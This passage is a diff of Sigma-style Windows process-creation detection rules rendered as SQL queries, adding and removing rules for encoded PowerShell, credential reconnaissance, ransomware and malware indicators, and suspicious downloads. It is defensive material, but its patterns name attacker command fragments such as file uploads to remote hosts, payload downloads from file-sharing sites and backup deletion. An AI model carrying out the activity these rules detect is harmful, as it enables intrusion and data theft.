"attack.impact", + "attack.t1485" ], "falsepositives": [ - "Authorized administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%lockoutduration%' ESCAPE '\\' OR CommandLine LIKE '%lockoutthreshold%' ESCAPE '\\' OR CommandLine LIKE '%lockoutobservationwindow%' ESCAPE '\\' OR CommandLine LIKE '%maxpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdage%' ESCAPE '\\' OR CommandLine LIKE '%minpwdlength%' ESCAPE '\\' OR CommandLine LIKE '%pwdhistorylength%' ESCAPE '\\' OR 
CommandLine LIKE '%pwdproperties%' ESCAPE '\\') OR CommandLine LIKE '%-sc admincountdmp%' ESCAPE '\\' OR CommandLine LIKE '%-sc exchaddresses%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((CommandLine LIKE '% -h%' ESCAPE '\\' OR CommandLine LIKE '% -c%' ESCAPE '\\' OR CommandLine LIKE '% -z%' ESCAPE '\\' OR CommandLine LIKE '% /\\?%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_enumeration.yml" + "filename": "proc_creation_win_sysinternals_sdelete.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share", - "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", + "title": "Suspicious PowerShell Encoded Command Patterns", + "id": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", "status": "experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Other tools that work with encoded scripts in the command line instead of script files" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.Exe', 'pwsh.dll')) AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR 
CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\') AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% PAA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_mailboxexport_share.yml" + "filename": "proc_creation_win_powershell_encoded_cmd_patterns.yml" }, { - "title": "Base64 Encoded PowerShell Command Detected", - "id": "e32d4572-9826-4738-b651-95fa63747e8a", - "status": "test", - "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", + "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "status": "experimental", + "description": "Detects usage of cmdkey to look for cached credentials on the system", + "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1027", - "attack.defense_evasion", - "attack.t1140", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.005" ], "falsepositives": [ - "Administrative script libraries" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdkey.exe' ESCAPE '\\' OR OriginalFileName = 'cmdkey.exe') AND (CommandLine LIKE '% /l%' ESCAPE '\\' OR 
CommandLine LIKE '% -l%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_frombase64string.yml" + "filename": "proc_creation_win_cmdkey_recon.yml" }, { - "title": "Suspicious Shells Spawn by Java Utility Keytool", - "id": "90fb5e62-ca1f-4e22-b42e-cc521874c938", + "title": "Suspicious GrpConv Execution", + "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", "status": "experimental", - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)", - "author": "Andreas Hunkeler (@Karneades)", + "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", "attack.persistence", - "attack.privilege_escalation" + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\keytool.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_lolbin_susp_grpconv.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], + "title": "Execution of Powershell Script in Public Folder", + "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "status": "experimental", + "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", + "author": "Max Altgelt (Nextron Systems)", "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' 
ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_powershell_public_folder.yml" }, { - "title": "PUA - NirCmd Execution As LOCAL SYSTEM", - "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", - "status": "test", - "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Sideloading by Microsoft Defender", + "id": "7002aa10-b8d4-47ae-b5ba-51ab07e228b9", + "status": "experimental", + "description": "Detects execution of Microsoft Defender's CLI process (MpCmdRun.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use by administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MpCmdRun.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nircmd_as_system.yml" + "filename": "proc_creation_win_mpcmdrun_dll_sideload_defender.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", - "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", + "id": "52ff7941-8211-46f9-84f8-9903efb7077d", + "status": "test", + "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", "author": "Florian Roth (Nextron Systems)", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1134.004" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR 
OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_hktl_selectmyparent.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", + "title": "Renamed SysInternals DebugView Execution", + "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "description": "Detects suspicious renamed SysInternals DebugView execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": 
"c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", + "status": "experimental", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol 
binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND 
NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", 
- "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR 